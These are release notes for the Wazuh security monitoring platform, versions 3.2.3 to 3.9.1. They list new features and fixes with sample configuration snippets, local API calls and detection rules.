This section shows the most relevant improvements and fixes in version 3.9.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Log collector: Improved wildcards support for Windows platforms. Now, it is possible to set multiple wildcards per path as is shown below:

    <localfile>
        <location>C:\Users\user\Desktop\*test*</location>
        <log_format>syslog</log_format>
        <exclude>C:\Users\user\Desktop\*test*.json</log_format>
    </localfile>
    
  • Fixed crash when an active response command was received and the module was disable

  • Fixed crash when collecting large files on Windows.

  • Fixed Wazuh manager automatic restart via API on Docker containers.

  • Fixed corruption error in cluster agent info files synchronization.

  • Reverted five seconds reading timeout in FIM scans.

Wazuh apps
  • Added support for Elastic Stack v7.1.0

  • Added support for Elastic Stack v6.8.0

  • Improve dynamic height for configuration editor in Splunk app.

  • Fixed infinite API log fetching, fix a handled but not shown error messages from rule editor in Splunk app.

Wazuh ruleset
  • macOS SCA policies based on CIS benchmarks have been corrected.

  • Windows rules for EventLog and Security Essentials have been fixed as well as the field filters are now more restrictive to avoid false positives.

  • Fixed typo in Windows NT registries within Windows SCA policies.

Elastic Stack 7

Wazuh is now compatible with Elastic Stack 7, which includes, between others, new out of the box Security features.

Additionally, since this Wazuh release, Logstash is no longer required, Filebeat will send the events directly to Elasticsearch server.

Elastic Stack 6.x is still supported by Wazuh.

3.9.0 Release notes - 2 May 2019

This section shows the most relevant improvements and fixes in version 3.9.0. More details about these changes are provided in each component changelog:

Wazuh core

Automated deployment

Agent installers support now variables which allow deploy an agent in a simple step.

Here we can see an example for CentOS/RHEL:

$ WAZUH_MANAGER_IP="10.0.0.2" yum install wazuh-agent

The above example will install, configure and register the agent, making simple the deployment process.

Security Configuration Assessment (SCA)

Security Configuration Assessment (SCA) is a new module created to improve hardening and policy monitoring capabilities in Wazuh. Policy files are now in YAML format, making easier modifications and reading. Policies have been extended, useful compliance information has been added to each policy (rationale, remediation, CSC, etc.). Scan results are sent and stored in Manager side, being accessible using both the Wazuh API and the Wazuh app.

SCA includes a new database integrity algorithm (which will be included on other modules as FIM and Inventory in the coming releases). The agent will send only those checks which status have changed from previous scans, saving network traffic and decreasing manager load.

Here is an example that runs a scan the 15th of every month:

<sca>
    <enabled>yes</enabled>
    <scan_day>15</scan_day>
    <policies>
        <policy>cis_debian_linux_rcl.yml</policy>
    </policies>
</sca>

Inventory module

  • Get network and open ports for Windows XP and Windows Server 2003 systems.

  • Events information can be decoded into dynamic fields, so we can define rules based on Inventory events. Decoders now accept syscollector as value for <decoded_as> tags.

  • Get the real MAC address of each interface in /sys/class/net/address instead of getting it from interfaces with AF_PACKET sockets, avoiding this way problems with bonded interfaces that share the same MAC address at software level.

FIM: Who-data

  • Who-data now supports a pre-start health check to make sure Audit socket is ready.

  • Who-data now supports symbolic links hot changes.

  • Added support for Fedora 29 systems that use Audit 3.0.

AWS Organizations in CloudTrail

With this enhancement, it is possible getting logs for created organizations by adding <aws_organization_id>ORGANIZATION</aws_organization_id> in the module configuration.

Here is an example of how to configure this new AWS capability:

<wodle name="aws-s3">
    <disabled>no</disabled>
    <bucket type="cloudtrail">
        <name>cloudtrail</name>
        <aws_organization_id>wazuh</aws_organization_id>
        <aws_profile>default</aws_profile>
    </bucket>
    <remove_from_bucket>no</remove_from_bucket>
    <interval>20m</interval>
    <run_on_start>yes</run_on_start>
    <skip_on_error>no</skip_on_error>
</wodle>

Wazuh cluster

  • The Wazuh manager no longer has any external dependencies on Python. The manager now includes its own embedded Python 3 interpreter. Making easier to configure integrations as AWS, VirusTotal, Azure or Slack.

  • Cluster synchronization speed is now 100x faster, thanks to asyncio library (Asynchronous I/O) which increases multi-threading performance and network communication.

Added -t and -c options for the Wazuh cluster daemon. Those options allow the user to test an isolated configuration file or to test the existing one configuration file.

Other fixes and improvements

  • Fixed an error in the OSquery configuration validation. The osqueryd daemon started no matter the string it received, whether it was yes, no or anything else.

  • Wazuh manager starts regardless of the contents of local_decoder.xml.

  • Prevent Integrator, Syslog Client and Mail forwarded from getting stuck while reading alerts.json.

  • Vulnerability detector module now checks that the severity of the alerts has been unified and it also checks if the database is empty before starting a new scan.

  • Labels starting with _ are now reserved for internal use only.

  • Windows installer now load the corresponding configuration file based on the system version.

  • Increase 80x remoted daemon performance for TCP connections.

Wazuh API
  • Manager configuration file is now editable.

  • Creation, edition and removal of rules, decoders and CDB Lists is now supported.

  • Multiple nodes restart.

  • SCA endpoints for policies, scan and checks.

GET /sca/001
{
    "error": 0,
    "data": {
        "totalItems": 3,
        "items": [
            {
                "pass": 2,
                "references": "https://www.ssh.com/ssh/",
                "invalid": 0,
                "description": "Guidance for establishing a secure configuration for SSH service vulnerabilities.",
                "end_scan": "2019-04-30 05:29:50",
                "score": 22,
                "fail": 7,
                "hash_file": "4c7d05c9501ea38910e20ae22b1670b4f778669bd488482b4a19d179da9556ea",
                "start_scan": "2019-04-30 05:29:50",
                "total_checks": 9,
                "name": "System audit for SSH hardening",
                "policy_id": "system_audit_ssh"
            },
            ...
        ]
    }
}
  • Dive into your SCA scan results using the API.

GET /sca/001/checks/system_audit_ssh
{
    "error": 0,
    "data": {
        "totalItems": 76,
        "items": [
            {
                "description": "The option MaxAuthTries should be set to 4.",
                "file": "/etc/ssh/sshd_config",
                "remediation": "Change the MaxAuthTries option value in the sshd_config file.",
                "policy_id": "system_audit_ssh",
                "rationale": "The MaxAuthTries parameter specifies the maximum number of authentication attempts permitted per connection. Once the number of failures reaches half this value, additional failures are logged. This should be set to 4.",
                "id": 1508,
                "title": "SSH Hardening - 9: Wrong Maximum number of authentication attempts",
                "result": "failed",
                "compliance": [
                {
                    "key": "pci_dss",
                    "value": "2.2.4"
                }
                ],
                "rules": [
                {
                    "type": "file",
                    "rule": "f:$sshd_file -> !r:^\s*MaxAuthTries\s+4\s*$;"
                }
                ]
            },
            ...
        ]
    }
}
Wazuh app

Wazuh manager configuration editor

Edit the content of the configuration file for one or more nodes using the interface editor.

Ruleset editor

Thanks to the recently added Wazuh API endpoints, the app comes with multiple improvements for the ruleset section, including rules, decoders and CDB list management.

Expand visualizations

For those cases you want to see a visualization bigger than it is, you can click the expand icon.

Other additions and improvements

  • Added new dashboards for SCA and Docker modules.

  • Added support for more than one Wazuh monitoring pattern.

  • Added a cron job for fetching missing fields of all valid index patterns, also merging dynamic fields every time an index pattern is refreshed by the app.

  • Added a new way to read manager logs.

  • Added resizable columns by dragging in tables.

Wazuh ruleset
  • Added new options <same_field> and <not_same_field> to correlate dynamic fields in rules.

    <rule id="100002" level="7" frequency="3" timeframe="300">
        <if_matched_sid>100001</if_matched_sid>
        <same_field>netinfo.iface.name</same_field>
        <same_field>netinfo.iface.mac</same_field>
        <not_same_field>netinfo.iface.rx_bytes</not_same_field>
        <options>no_full_log</options>
        <description>Testing options for correlating repeated fields</description>
    </rule>
    
  • Improved rules for Docker to prevent the activation of certain rules that should not be activated.

  • Modified the structure and the names for Windows EventChannel fields in all the related rules.

  • Fixed the brute-force attack rules for Windows EventChannel by adding the new <same_field> option and changing some rules.

  • Added Sysmon rules for Windows EventChannel.

    <rule id="61619" level="0">
        <if_sid>61618</if_sid>
        <field name="win.eventdata.parentImage">\\services.exe</field>
        <description>Sysmon - Legitimate Parent Image - svchost.exe</description>
    </rule>
    
    
    <rule id="61620" level="12">
        <if_group>sysmon_event1</if_group>
        <field name="win.eventdata.image">lsm.exe</field>
        <description>Sysmon - Suspicious Process - lsm.exe</description>
        <group>pci_dss_10.6.1,pci_dss_11.4,gdpr_IV_35.7.d,</group>
    </rule>
    
  • Added a new rule to catch logon success from a Windows workstation.

    <rule id="60118" level="3">
        <if_sid>60106</if_sid>
        <field name="win.eventdata.workstationName">\.+</field>
        <field name="win.eventdata.logonType">^2$</field>
        <description>Windows Workstation Logon Success</description>
        <options>no_full_log</options>
        <group>authentication_success,pci_dss_10.2.5,gpg13_7.1,gpg13_7.2,gdpr_IV_32.2,</group>
    </rule>
    

3.8.2 Release notes - 31 January 2019

This section shows the most relevant fixes in version 3.8.2. A complete list of changes is provided in the change log.

Wazuh manager
  • Fixed a bug crashing Analysisd when accumulating logs. This bug affected decoders that use the option <accumulate>, like the decoder for OpenLDAP logs, provided out of the box.

  • Some fields of alerts related to Windows Eventchannel logs included unwanted backslashes (\) and trailing whitespaces. This was due to a log cleaning issue in the manager.

Wazuh agent
  • Prevent Modulesd from crashing when the configuration contained a <wodle name="command"> stanza without an explicit <tag> option.

3.8.1 Release notes - 24 January 2019

This section shows the most relevant improvements and fixes in version 3.8.1. More details about these changes are provided in each component changelog:

Wazuh core
  • Fixed memory leak in Logcollector when reading Windows eventchannel.

  • Fixed version comparisons on Red Hat systems in vulnerability detector module.

Wazuh API
  • Fixed an issue with the log rotation module which may makes the Wazuh API unavailable on Debian systems.

  • Fixed improper error handling. Prevented internal paths to be printed in error output.

3.8.0 Release notes - 18 January 2019

This section shows the most relevant improvements and fixes in version 3.8.0. More details about these changes are provided in each component changelog:

Wazuh core

Support for new AWS services

  • AWS Config

  • AWS Trusted Advisor

  • AWS KMS

  • AWS Inspector

  • Add support for IAM roles authentication in EC2 instances.

Adding new kind of buckets to your integration is as simple as adding an entry like this to your AWS configuration:

<bucket type="config">
  <name>wazuh-aws-wodle</name>
  <path>config</path>
</bucket>

The alerts that Wazuh sends to Elasticsearch are now including all these AWS additions, so you can track all your AWS services / buckets using Kibana.

Windows events are collected in native JSON

  • The inventory features for Windows are now using native queries directly to the Windows API, this adds value for this feature, enriches the inventory for Windows and guarantees that you can check your Windows agent accurately.

  • Windows events are now being fetched in JSON format, which provides a useful format for third-party software and makes Wazuh be more optimized while analyzing Windows events. This improves Windows alerts result and analyzing performance. From this version, Windows agents apply a new rule set

  • FIM for Windows agents now has the ability to detect changes in attributes and file permissions.

Agents keys polling module

When Remoted reads an invalid key, now it can retrieve it from an external database server and store it to the client.keys file.

Details:

  • Integrated agent key request to external data sources.

  • Look for missing or old agent keys when Remoted detects an authorization failure.

  • Request agent keys by calling a defined executable or connecting to a local socket.

FIM who-data changes

  • Added a health check for who-data monitoring features. It checks if the Audit events socket is working before starting the who-data engine in order to avoid start listening to it when it's blocked or disabled.

  • Checks if a rule already exists before trying to insert it to avoid flooding in the audit.log file.

  • Who-data module is now able to re-connect to an Audit socket even if the instance is using enforcing with SELinux. Before this enhancement, Wazuh could not re-connect the socket after restart Wazuh if enforcing was being used along Audit.

CDB lists auto build

Now the CDB lists are built at installation time, so there is no need to execute ossec-makelists as before for the default lists. Custom lists (added after installation) still need to be compiled manually.

Other Wazuh core fixes and improvements

  • When upgrading, databases used for FIM purposes are now auto-upgraded by Wazuh (no need for scripts).

  • Vulnerability detector has been improved for RedHat systems.

  • This version also fixes some known issues when using Wazuh on ARM, HP-UX or AIX systems.

  • Logcollector component has been refactored, multiple known issues have been fixed, its performance has been also improved.

  • Improved IP address validation in the option <white_list> (Credits to @pillarsdotnet).

  • Improved rule option <info> validation (Credits to @pillarsdotnet).

  • Fixed error description in the osquery configuration parser (Credits to @pillarsdotnet).

  • The FTS comment option <ftscomment> was not being read (Credits to @pillarsdotnet).

Wazuh API

New API calls for group management

  • Edit group configuration file (agent.conf) uploading XML file with new configuration. This addition brings the user the ability to manage groups remotely, from now and onward it's no longer needed to SSH into the manager instance to modify groups or to add/remove agents in groups.

# curl -u foo:bar -X POST -H 'Content-type: application/xml' -d @/tmp/agent.conf.xml \
    "http://localhost:55000/agents/groups/default/files/agent.conf?pretty"
{
  "error": 0,
  "data": "Agent configuration was updated successfully"
}
  • Add or remove agents of a group in bulk.

  • Added a new parameter named format for fetching the agent.conf content in JSON/XML format depending on the parameter value.

Wazuh API also has these fixes for this version

  • Now the Wazuh API service gets the group ID and user ID properly when using Docker containers.

  • Added missing information when requesting certain files from a group.

  • Rule variables from the Wazuh ruleset are now replaced by its real value when fetching rules.

Wazuh app

Group management from the app is now available

Manage your groups from the app, this feature includes:

  • Edit group configuration (agent.conf), just open the XML editor we've added, edit the group configuration and send it to the Wazuh API.

  • Adding and removing agents in groups. An intuitive view has been added to drag-drop agents in your groups then a button is clicked and your groups are updated.

New search bar for the agents' list

  • The search bar has been modified to provide an better user experience.

  • It suggests filters, allows multiple filters at the same time, combines string searches with filters, same as before but now in one place.

New tables for an agent FIM monitored files

  • The app detects the agent OS in order to show the right FIM data. For instance, if it's a Windows agent, the app shows Windows registry entries.

  • As most of the app tables, these tables include a search bar and sortable columns.

Modify the Wazuh monitoring index pattern name

This was added before for Wazuh alerts indices, now you can do the same for monitoring indices editing the app configuration file (config.yml).

# Default index pattern to use for Wazuh monitoring
wazuh.monitoring.pattern: wazuh-monitoring-3.x-*

Edit the app configuration file (config.yml) from the app

  • Those settings are shown at Settings > Configuration as before but now they include a pencil icon which allows you to edit certain settings.

  • Note: Some settings need that Kibana is restarted before being applied.

Other app improvements

  • The Dev Tools utility has been improved, small bugs fixed, resizable columns by dragging.

  • Template check from the app health check now accepts multipattern templates.

  • All known fields for all the index patterns are now refreshed on the app health check too.

  • Added "Registered date" and "Last keep alive" in agents table allowing you to sort by these fields.

  • Now the app looks for the request target if the destination is unreachable. Now you'll know if it was Elasticsearch or the Wazuh API.

Wazuh ruleset

New rules/decoders for Windows

Our ruleset this time comes with some new rules/decoders for Windows:

  • Added new rules to support the new Windows eventchannel decoder.

  • Extend Auditd decoder to support more fields.

And we've added a new rule to alert when an agent is removed.

3.7.2 Release notes - 17 December 2018

This section shows the most relevant fixes in version 3.7.2. More details about these changes are provided in the component changelog:

Logcollector and Analysis daemon fixes

The Logcollector module received two improvements in Wazuh 3.7.2:

  • Fixed bugs related to the management of special characters such as the new line delimiter (\n), or binary data. From now on, Logcollector will discard log lines containing binary characters.

  • Fixed errors when Logcollector tries to open or analyze files that disappeared, or when querying if a file reached its end.

In addition to this, the Analysis daemon has been fixed to avoid errors when Windows agents in version 3.7.0 report files whose owner username contains whitespace characters.

3.7.1 Release notes - 5 December 2018

This section shows the most relevant improvements and fixes in version 3.7.1. More details about these changes are provided in each component changelog:

Improved who data capabilities for FIM

This version comes with a new option for the FIM configuration. Now is possible to add extra Audit keys using <audit_key> tag. It allows the who data engine to capture Audit events related to the key.

Other minor improvements

Wazuh 3.7.1 includes some other improvements:

  • Restored the support for Amazon Linux on the Vulnerability detector.

  • Improved performance of the Remote service.

  • Added IPv6 support for the host-deny.sh script from Active Response.

  • Included more tracing information to the logs generated on debugging mode.

  • The FIM engine now gives more descriptive messages when a file is not reachable.

New features for Kibana plugin

The main highlights for the Wazuh app for Kibana include a new auto-complete feature for the Dev tools tab, so now the user can start typing an API request to see a list of suggestions.

In addition to this, some refinements and bugfixes were added for better stability and overall performance.

New features for Splunk plugin

The main highlights for the Wazuh app for Splunk include support for extensions, new tabs for VirusTotal and CIS-CAT alerts, the Export as CSV button for several tables and the ability to execute PUT, POST and DELETE requests on the Dev tools tab, along with GET requests.

In addition to this, code refactoring, visual/ UI adjustments, and bugfixes were added for better stability and overall performance.

3.7.0 Release notes - 10 November 2018

This section shows the most relevant improvements and fixes in version 3.7.0. More details about these changes are provided in each component changelog:

Adding agents to multiple groups

One of the major enhancements of this new version consists of adding agents to more than one group simultaneously.

With this improvement, now the agents can be set up using multiple configuration files, and this makes possible to share specific configuration blocks between agents, making this process more powerful to configure the environment. The new feature allows consulting all the agent's group information with the agent_groups tool and on the app using the Wazuh API.

In this example, an agent is added to two new groups.

# curl -u foo:bar -X PUT "http://localhost:55000/agents/001/group/webserver?pretty"
{
  "error": 0,
  "data": "Group 'webserver' added to agent '001'."
}
# curl -u foo:bar -X PUT "http://localhost:55000/agents/001/group/apache?pretty"
{
  "error": 0,
  "data": "Group 'apache' added to agent '001'."
}

And on the API, it's possible to check all the groups the agent is added:

# curl -u foo:bar -X GET "http://localhost:55000/agents/001?pretty"
{
  "error": 0,
  "data": {
    "status": "Active",
    "configSum": "f993610d3e6d7bfd7c008b4fb6deb8a5",
    "group": [
      "default",
      "webserver",
      "apache"
    ],
    "name": "ag-windows-12",
    ...
  }
}

The agent will receive the configuration of all the groups where it has been added.

Learn more about this feature in the multiple groups' documentation.

New module to monitor Microsoft Azure

The new azure-logs module for Wazuh has the ability to obtain and read Azure logs through several service APIs. This helps to monitor all the activity happening in the infrastructure, just by setting up the module to monitor the virtual machines that form the infrastructure, sending events to the Wazuh manager for analysis.

There are several ways to monitor the Azure instances:

  • Installing the Wazuh agent on the instances.

  • Monitoring the instances activity through Azure APIs. This includes data about all resource operations (creation, update, and deletion), Azure notifications about the instances, suspicious file executions, health checks, autoscaling events, and so on.

  • Monitoring the Azure Active Directory service. Monitoring management actions such as creation, update or deletion of users. It's possible to receive alerts on the Wazuh manager when some of these events occur on the Azure infrastructure.

To learn more about this new module and how to configure it, check out the section Monitoring Microsoft Azure with Wazuh.

New module to monitor Docker

The new docker module for Wazuh makes easier to monitor and collect the activity from Docker containers such as creation, running, starting, stopping or pausing events.

In addition to this, and as always, the Wazuh agent can be used to monitor more services and events from the Docker servers, like File integrity or Log data collection.

In this example, the Docker command docker pause apache will stop the container apache and will trigger an alert, as seen on the screenshot below from the Wazuh app for Kibana:

To learn more about this new module and how to configure it, check out the section Using Wazuh to monitor Docker.

Query remote configuration

It's now possible to query for the agent configuration in real time.

These on-demand queries allow searching for the currently applied configuration on the manager and each agent in every moment. As seen on the screenshot below with some basic agent information, this query lets to check the current settings about every enabled module.

Improved performance of FIM and Analysis engines

The Analysis and Integrity Monitoring engines have been enhanced with multithreaded processing. It takes advantage of all manager host's resources by processing events in parallel, getting more performance at lower cost.

The registries generated by the File Integrity Monitoring system are now stored on a new SQLite database. Besides, the required storage resources have been reduced, making it faster and more efficient.

Breaking changes

The old File Integrity Monitoring plain text databases are no longer in use. After the upgrading process, it's necessary to execute the migration script in order to preserve the previous FIM entries.

Distributed API requests in cluster mode

The cluster capabilities were improved to allow distributed API requests. Now the nodes communicate between them to collect information, such as agents status or logs, providing data related to the global architecture, instead of a single instance.

In addition to this, the last keep alive checks on the cluster nodes have been improved, disconnecting them if they don't have internet connection during a certain amount of time.

Advanced API filtering using queries

In this version, the Wazuh API includes a new filtering system. The q parameter allows requesting information using advanced queries with logical operators and separators. Find a more detailed explanation of this feature in the API queries section.

New features for Kibana plugin

The Wazuh app for Kibana includes new features and interface redesigns to make use of the new features included in this version:

  • Get the current manager/agent configuration on the redesigned tabs.

  • Added support for multiple groups feature.

  • The Amazon AWS tab has been redesigned to include better visualizations and the module configuration.

  • The new Osquery extension shows scans results from this Wazuh module.

  • Added a new selector to check the cluster nodes’ status and logs on the Management > Status/Logs tabs.

  • Several bugfixes, performance improvements, and compatibility with the latest Elastic Stack version.

Breaking changes

Wazuh 3.7.0 introduces an update to the Elasticsearch template. This will cause a breaking change in existing installations, although new installations won't be affected by this error.

To learn more about how to fix this, check out the Kibana app's troubleshooting guide.

New features for Splunk plugin

The Wazuh app for Splunk also receives lots of new features and improvements on this new version. The Configuration tab is also improved as on the Kibana plugin to get the current manager/agent configuration, multiple groups support, and also:

  • A documentation article to set up a reverse proxy configuration for Nginx and the Splunk plugin is now available.

  • Added Dev tools, Amazon AWS, Osquery, Inventory data and Monitoring tabs to the app.

  • Added app logs to monitor to check and troubleshoot problems while using the app.

  • Added a new selector to check the cluster nodes’ status and logs on the Management > Status/Logs tabs.

  • Several bugfixes, performance improvements, and compatibility with the latest Splunk version.

3.6.1 Release notes - 7 September 2018

This section shows the most relevant improvements and fixes in version 3.6.1. More details about these changes are provided in each component changelog.

Wazuh core

This release is a patch version that fixes some issues encountered in v3.6.0. Some of them are listed below:

  • The agent.name field has been put back to the alerts in JSON format. On the other hand, we've fixed a problem in the location description of the plain-text alerts.

  • Vulnerability Detector has been improved to support Debian Sid (the unstable version).

  • We have also optimized the memory management on agents for AIX and HP-UX systems.

  • The daemon start and stop list has been reordered in the agent service.

  • We have corrected the actual recursion level limit in FIM real-time mode.

  • We have improved the AWS integration parser and its capabilities.

  • Some other fixes have been applied on this version.

Wazuh API

In this version, the API makes it possible to send Active Response requests, including custom commands that are not declared in the configuration.

For instance:

curl -u foo:bar -X PUT -d '{"command":"restart-ossec0", "arguments": ["-", "null", "(from_the_server)", "(no_rule_id)"]}' -H 'Content-Type:application/json' "http://localhost:55000/active-response/001?pretty"
{
  "error": 0,
  "message": "Command sent."
}

3.6.0 Release notes - 29 August 2018

This section shows the most relevant improvements and fixes in version 3.6.0. More details about these changes are provided in each component changelog.

Wazuh core

This section shows the main features introduced in this new version for the Wazuh core.

Logcollector

Logcollector has been enhanced with two new features:

  • Now it works in multithread mode. This will improve the throughput and prevent delays among outputs.

  • Wildcard reloading is now supported: files that match a wild-carded location will be monitored, no need to restart the agent.

File integrity monitoring

The policy monitoring (rootcheck) and file integrity monitoring (syscheck) engines now run independently, so they both can perform a scan at the same time.

Two new features have been added to file integrity monitoring:

  • Tags for monitored items. This will make alert matching and classification easier.

  • A new option to limit the recursion level (scanning folder depth) has been introduced.

Wazuh modules
  • Introducing a re-work of the AWS S3 integration, now supporting CloudTrail, GuardDuty, Macie, IAM, and VPC Flow log data.

  • The download of OVAL files for Vulnerability Detector has been fixed since Red Hat has changed its protocol to send this files.

  • Custom command execution (wodle command) supports MD5/SHA1/SHA256 validation of the target binary for execution authorization.

Log analysis and management
  • The manager will provide remote message statistics, including counting of messages received or dropped, and number of active TCP sessions.

  • The size limit for logs has been extended from 6 KiB to 64 KiB.

  • The analysis engine now interprets the hostname field of the input logs as the name of the agent, instead of name+IP. This allows CDB list lookup of agent name.

Wazuh app for Kibana
  • Support for Kibana v6.4.0.

  • Added new options to config.yml to change shards and replicas settings for wazuh-monitoring indices.

  • Improved building package procedure.

  • The welcome tabs in Overview and Agents have been updated with a new name and description for the existing sections.

  • Adapted for Internet Explorer 11.

Wazuh app for Splunk

The Splunk app has been redesigned from the ground based on Material Design.

  • SplunkJS framework (RequireJS + BackboneJS + JQuery) has been wrapped into AngularJS.

  • Brand new menus, tabs, filters and settings.

  • Dynamic visualizations, granting improved performance.

  • Dynamic filter queries.

You can follow our installation guide to test it out: https://documentation.wazuh.com/current/installation-guide/installing-splunk/index.html

3.5.0 Release notes - 10 August 2018

This section shows the most relevant improvements and fixes in version 3.5.0. More details about these changes are provided in each component changelog.

Wazuh core
  • A new integration with osquery is shown, this will provide new scheduled results for the manager:

    • The osquery daemon will be launched in background.

    • Filter events by osquery by adding a new option in <location> rules.

    • Enrich osquery configuration with pack files aggregation and agent labels.

    • Support folders in shared configuration.

  • Parallelized remoted daemon:

    • Up to 16 parallel threads to decrypt messages from agents.

    • Frequency of agent keys reloading limited.

    • Message input buffer in Analysisd to prevent control messages starvation in Remoted.

  • Vulnerability Detector has been enhanced, adding support for other operating systems and improving the configuration of OVAL updates.

    • Added feed tag for updating each operating system OVAL, allowing to set a different configuration for each of them.

    • Packages already scanned won't be checked unless no Syscollector scans are detected in a period longer than 24 hours.

    • Added arch check for Red Hat's OVAL.

    • Force the vulnerability detection in unsupported OS with the <allow> attribute.

  • Fixed alerts format in Vulnerability Detector. When showing Vulnerability Detector alerts from a Red Hat agent, an RHSA patch was shown instead of a CVE. This patch consists in various CVEs compressed. The RHSA patches are unpackaged and alerts manifest that the system is vulnerable to each of the CVEs contained in that RHSA.

  • Added new support for AES encryption for manager and agent.

  • Enhanced active response process. Added a new feature which allows the user to customize the parameters sent to the agent's active response script.

  • Added synchronization for remoted counters (rids), being reloaded if the inode of the file has changed.

  • Windows deletes pending active-responses when an output signal is received.

  • Rootcheck searchs for 32-bit and 64-bit keys. As Windows agent only runs in 32-bit mode, by default Rootcheck was searching only for 32-bit keys.

  • Get Linux packages, DEB and RPM, for Syscollector.

  • Added a new module for downloading shared files for agent groups dynamically.

  • Get running processes, opened ports, network interfaces, Linux (DEB/RPM) and Windows inventories natively for Syscollector.

    • Added field to the hardware inventory about the RAM usage, without using wmic.

    • Storage of multiple addresses/netmasks/broadcasts per interface in the DB.

    • CentOS 5 compatibility to run the network scan.

Wazuh API
  • Added information about the user who made the request in the API logs.

  • New option for downloading the wpk using HTTP in agent_upgrade.

  • Rotation of log files at midnight.

  • Added new API requests for syscollector.

  • Ignore uppercase and lowercase sorting an array.

Wazuh ruleset
  • Added rules for the new osquery integration.

  • Improved CIS-CAT rules.

  • Ignoring syscollector events rule added.

Wazuh app for Kibana
  • As part of the Elastic Stack v6.3.x compatibility process, now we have support for Kuery as query language for the app search bars.

  • Added new tab on Configuration to show the current Wazuh app configuration file values.

  • Added new tab on Configuration to show the latest Wazuh app logs.

  • Added XML/JSON viewer to Management → Configuration.

  • Improved reports, now with a better design and document structure.

  • Human-readability improvements for visualizations, tables and CSV files.

  • Now it’s possible to remove all the API entries from Settings.

  • More design improvements for the Welcome tab on some app sections.

  • More bug fixes, code refactoring and performance improvements.

In addition to this, the documentation now has a dedicated section for the Wazuh app, where you can learn more about its capabilities, how to configure it and install the X-Pack Security plugin.

3.4.0 Release notes - 24 July 2018

This section shows the most relevant improvements and fixes in version 3.4.0. More details about these changes are provided in each component changelog.

Wazuh core

The main feature introduced in this version is the ability to monitor the information relative to the user who makes changes to any file monitored with FIM. This information (who-data) contains the user who makes the changes and also the process used. This new functionality is available in Syscheck on Linux and Windows. See the Auditing who-data section for further information.

Many others improvements and fixes have been included in Syscheck in this new version:

  • The level of recursiveness when scanning directories can be defined in the internal_options.conf file. By default, it's set to 256.

  • Added support for SHA256 checksum (by Arshad Khan @arshad01).

  • Enhanced visualization of Syscheck alerts and insertion of all the available fields in the Syscheck messages from the Wazuh configuration files.

  • The value xxx (not enabled) was replaced for n/a if the hash couldn't be calculated.

  • Fixed registry_ignore problem on syscheck for Windows when arch="both" was used.

  • Allow more than 256 directories in real-time for Windows agent using recursive watchers.

There are other changes which are worth highlighting:

  • Added a new option to customize the output format per-target in Logcollector.

  • Added support for unified WPK. Now the WPK files are compatible between versions for the same OS.

  • The CA verification was fixed to allow with more than one 'ca_store' definition.

Wazuh API
  • Added new API request: GET/agents/stats/distinct. This new request returns all the different combinations that agents have for the selected fields.

  • Added experimental_feature option to enable new features in development.

Wazuh ruleset
  • In older versions, the frequency attribute in rules was the number of hits + 2. In this version this value has been modified to match exactly the number of hits. By this way this value is more easy to understand.

Wazuh app for Kibana
  • Tables redesign.

  • Improved reporting capabilities.

  • Improved Discover performance.

  • UI redesign, including simpler Welcome screen.

  • New healthcheck design.

  • Dev tools one liners.

  • New inventory tab.

  • Minor bugfixes.

Wazuh app for Splunk
  • Support for Splunk v7.1.2.

  • Dashboard tabs redesign.

  • Minor bugfixes.

3.3.1 Release notes - 18 June 2018

This section shows the most relevant improvements and fixes in version 3.3.1. More details about these changes are provided in each component changelog.

Wazuh core

Most of the fixes introduced in this new version are focused on the user experience when dealing with the Wazuh management. Improving log messages and configuration issues among other things. There are a few changes which are worth highlighting:

  • Fixed a bug that prevented the remote upgrades for Ubuntu agents.

  • An alert has been added to be aware when the process of unmerging the centralized configuration fails.

  • Prevent interference between the Windows Defender antivirus and the Wazuh agent when managing temporary bookmark files.

  • It is now possible to set up empty blocks of configuration for some modules. For example, the vulnerability detector module can be enabled by typing <wodle name="vulnerability-detector"/>, applying it the default configuration for that module.

Wazuh API
  • The request to delete agents includes two new fields with the affected agents by the deletion request, as well as the failed IDs.

  • Fixed error when trying to upgrade Never connected agents by the API.

3.3.0 Release notes - 8 June 2018

This section shows the most relevant improvements and fixes in version 3.3.0. More details about these changes are provided in each component changelog.

Wazuh core

Logcollector now supports socket connection for log output mirroring. This feature allows to send the same event to the Wazuh manager and to a 3rd party log processor like Fluent Bit. You can find more information here.

The analysis engine includes new options for the plugin decoders to set the input offset with respect to the prematch expression or the parent decoder. See an example about this on this section. In addition, plugin decoders and multi-regex decoders can be used together.

We have also introduced an event formatter in the log collector to build custom events, this allows to add some data into the event.

As of this version, the timestamp of the alerts in JSON format will include milliseconds.

The implementation of the Agentless daemon has been improved for enhanced security.

Some other fixes and improvements have been introduced in the Framework and the Cluster.

Wazuh API

The API now has filters by group on the GET /agents call and by status on the GET /agents/groups/:group_id and GET /agents/groups/:group_id calls.

Now the limit parameter has been modified to retrieve all items using limit=0.

In addition to this, several bugfixes and performance improvements for the API have been added.

Wazuh app for Kibana
  • New design for the Overview and Agents tabs, following a breadcrumbs-based navigability to change between different sections.

  • New Reporting option, for generating logs about the current state of the visualizations on the Overview and Agents tabs.

  • New filters for agent version and cluster node on the Agents Preview tab.

  • Added a warning when your system doesn't have more than 3GB of RAM.

  • Several bugfixes and performance improvements.

Wazuh app for Splunk
  • Added monitoring for collecting periodical agent status data.

  • Now the .wazuh index will be the default one if no one is selected.

  • Several bugfixes and performance improvements.

3.2.4 Release notes - 1 June 2018

This section shows the most relevant improvements and fixes in version 3.2.4. More details about these changes are provided in each component changelog.

Wazuh minor fixes

Most of the bug fixes in this release are fairly minor, but a few fixes deserve special mention:

  • <queue_size> setting was not properly parsed by maild causing the termination of the process.

  • Python 3 incompatibilities in the framework that may affect the correct behavior of the cluster.

Wazuh app for Splunk

This release includes:

  • New GDPR tab.

  • Multi-API support.

  • Multi-index support.

  • Several performance improvements and bug fixes.

Wazuh app for Kibana

Relevant changes in the Wazuh app are:

  • New reporting feature: Generate reports from Overview and Agents tab.

  • New check included to warn about systems with low RAM (less than 3GB).

  • Several performance improvements and bug fixes.

3.2.3 Release notes - 28 May 2018

This section shows the most relevant improvements and fixes in version 3.2.3. More details about these changes are provided in each component changelog.

GDPR Support

The General Data Protection Regulation took effect on 25th May 2018. Wazuh helps with most technical requirements, taking advantage of features such as File Integrity or Policy monitoring. In addition, the entire Ruleset has been mapped following the GDPR regulation, enriching all the alerts related to this purpose.

You can read more information about the GDPR regulation and how Wazuh faces it on the this section: Using Wazuh for GDPR compliance.

Wazuh cluster

